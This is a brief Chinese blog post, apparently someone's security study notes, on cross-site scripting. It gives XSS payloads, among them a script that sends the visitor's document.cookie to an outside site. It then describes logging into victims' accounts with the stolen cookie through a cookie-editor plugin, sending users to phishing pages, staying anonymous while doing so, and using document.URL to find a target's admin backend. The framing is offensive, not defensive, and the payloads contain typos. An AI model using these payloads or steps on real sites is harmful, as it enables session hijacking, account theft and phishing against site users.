Cyber Security-Day3

XSS攻击

跨站脚本攻击,web应用程序的漏洞

插入JS代码

http://localhost/mst/htmlphp?html=<script>alert("xxx")</script>

基于DOM文档对象模型,可以用js操作DOM中的对象属性,使用document.location,document.url,document.referer等DOM元素的属性

实用场景:比如需要审核留言或者博客的网站,我们可以在输入框 嵌套"><script>alter("xxx")</scrpit>

<script>document.location.href="指定网站,比如https://www.bilibili.com/?cookie="document.cookie"</script>

这样可以跳转到指定网站拿到cookie然后登录

但是现在大厂加了一些

 

 

 

 

省略号需要处理,或者直接使用cookie editor插件

或者直接操作document.location.herf="xxxxxxxx"钓鱼网站,或者去拿到对方的cookie,使用曲奇插件导入直接操做方法是数据或者账号,这里匿名得做好。

document.URL如果知道对方的身份那么我们可以直接拿他访问的url直接获取对方的后台地址,前提都是找到一个可以XSS脚本注入的地方

posted @ 2022-06-28 22:34  Arrest  阅读(33)  评论(0编辑  收藏  举报